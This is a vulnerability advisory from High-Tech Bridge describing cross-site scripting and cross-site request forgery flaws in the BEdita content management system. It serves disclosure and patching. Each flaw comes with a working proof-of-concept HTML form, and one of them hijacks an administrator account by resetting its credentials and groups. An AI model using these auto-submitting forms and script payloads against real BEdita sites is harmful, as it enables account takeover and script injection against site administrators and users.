Advisory Details: |
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BEdita which could be exploited to perform cross-site scripting and cross-site request forgery attacks.
1) Cross-site scripting (XSS) vulnerability in BEdita The vulnerability exists due to input sanitation error in the "searchstring" parameter in bedita-app/controllers/home_controller.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Exploitation example: <form action="http://host/bedita-app/news/index" method="post" name="main"> <input type="hidden" name="searchstring" value='search"><script>alert(document.cookie)</script>'> </form> <script> document.main.submit(); </script>
2) Cross-site request forgery in BEdita 2.1 The vulnerability exists due to insufficient validation of the request origin bedita-app/news/saveCategories. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and create categories. Existing weakness in the administration interface may also allow arbitrary HTML and script code execution due to insufficient input sanitation in the "data[label]" HTTP POST parameter. Exploitation example: <form action="http://host/bedita-app/news/saveCategories" method="post" name="main"> <input type="hidden" name="data[label]" value='cat"><script>alert(document.cookie)</script>'> <input type="hidden" name="data[status]" value="on"> <input type="hidden" name="data[area_id]" value=""> <input type="hidden" name="data[object_type_id]" value="18"> </form> <script> document.main.submit(); </script> 2.2 The vulnerability exists due to insufficient validation of the request origin in bedita-app/controllers/modules/admin_controller.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials. Exploitation example: <form action="http://host/bedita-app/admin/saveUser" method="post" name="main"> <input type="hidden" name="data[User][id]" value="2"> <input type="hidden" name="data[User][userid]" value="tester"> <input type="hidden" name="data[User][realname]" value="tester"> <input type="hidden" name="data[User][email]" value="email@example.com"> <input type="hidden" name="pwd" value=""> <input type="hidden" name="data[User][passwd]" value=""> <input type="hidden" name="data[User][valid]" value="1"> <input type="hidden" name="groups" value=""> <input type="hidden" name="data[groups][administrator]" value="on"> <input type="hidden" name="data[groups][guest]" value="on"> </form> <script> document.main.submit(); </script> |
